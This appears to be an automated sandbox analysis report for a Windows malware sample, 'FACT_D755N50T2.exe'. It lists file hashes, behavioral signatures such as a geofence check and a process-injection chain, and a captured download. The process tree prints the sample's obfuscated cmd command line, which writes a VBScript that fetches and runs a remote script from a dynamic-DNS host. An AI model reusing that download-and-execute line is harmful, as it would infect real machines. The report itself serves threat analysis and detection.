Analysis
-
max time kernel
30s
-
max time network
35s
-
platform
windows10-2004_x64
-
resource
win10v2004-20230221-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20230221-en locale:en-us os:windows10-2004-x64 system
submitted
07-04-2023 00:44
Static task
static1
Behavioral task
behavioral1
Sample
FACT_D755N50T2.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
FACT_D755N50T2.exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral3
Sample
~.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
~.exe
Resource
win10v2004-20230220-en
General
-
Target
FACT_D755N50T2.exe
-
Size
1.5MB
-
MD5
35e24a8ce72dd5360fc826947abfdc10
-
SHA1
929e014f9d6271ae3ce82d5dadcd674631c9c779
-
SHA256
d0fbbba4a32cf5156daf563e6fa9b2133cc11b85a7a2632411eb7195ab35e9c7
-
SHA512
558bc4ac4c9da60fea107037789cfa7cb0cbe10829687bf50f71afb0cfa51bc74f5d5f478c59914e8e55f5b6bd4d9e487a3b1286327491189aa5e90f0c38cf4e
-
SSDEEP
24576:Z6Ykri0w6Hf0PjnVlYI5YALlgKPlDQKimQn+IZQaL89V6pZE1rrrrrrrrrrrrrrl:pKw6/0zVlYIqXKNKmGZXgZpO8
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
flow  pid   process
22    2768  WScript.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                    process
Key value queried  \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation  cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
description  ioc                                                                                   process
Key created  \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings  cmd.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
description                       pid   process             target process
PID 3680 wrote to memory of 2292  3680  FACT_D755N50T2.exe  cmd.exe
PID 3680 wrote to memory of 2292  3680  FACT_D755N50T2.exe  cmd.exe
PID 3680 wrote to memory of 2292  3680  FACT_D755N50T2.exe  cmd.exe
PID 2292 wrote to memory of 2884  2292  cmd.exe             cmd.exe
PID 2292 wrote to memory of 2884  2292  cmd.exe             cmd.exe
PID 2292 wrote to memory of 2884  2292  cmd.exe             cmd.exe
PID 2884 wrote to memory of 4208  2884  cmd.exe             cmd.exe
PID 2884 wrote to memory of 4208  2884  cmd.exe             cmd.exe
PID 2884 wrote to memory of 4208  2884  cmd.exe             cmd.exe
PID 4208 wrote to memory of 2768  4208  cmd.exe             WScript.exe
PID 4208 wrote to memory of 2768  4208  cmd.exe             WScript.exe
PID 4208 wrote to memory of 2768  4208  cmd.exe             WScript.exe
Processes
(process tree; each entry lists the image path, then the command line, then the signatures hit and the PID; nesting depth shows parent/child)
-
[1] C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe
    "C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe"
    - Suspicious use of WriteProcessMemory
    PID:3680
    -
    [2] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>%Public%\re9.vBs&&%ComSpec% /c start %Public%\re9.vBs"
        - Suspicious use of WriteProcessMemory
        PID:2292
        -
        [3] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>C:\Users\Public\re9.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs"
            - Suspicious use of WriteProcessMemory
            PID:2884
            -
            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs
                - Checks computer location settings
                - Modifies registry class
                - Suspicious use of WriteProcessMemory
                PID:4208
                -
                [5] C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Public\re9.vBs"
                    - Blocklisted process makes network request
                    PID:2768
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
107B
-
MD5
e7a1b7f622c413b656bd350365edaef2
-
SHA1
e769ca533dd368bb6d341e7a57c002dc6e07a289
-
SHA256
c0fd93d1266613402380c5f3888fe5df73103d25b6d4c848252221b06a749dbb
-
SHA512
b0b3871ced3eae994d050746610dc67bb02b6a8454c6fa826aec8cfdd3a0d8fe21c5e9fe44667f2c5ca85f80712006ff3fe9f08bb2694ae2a0d857e344afb861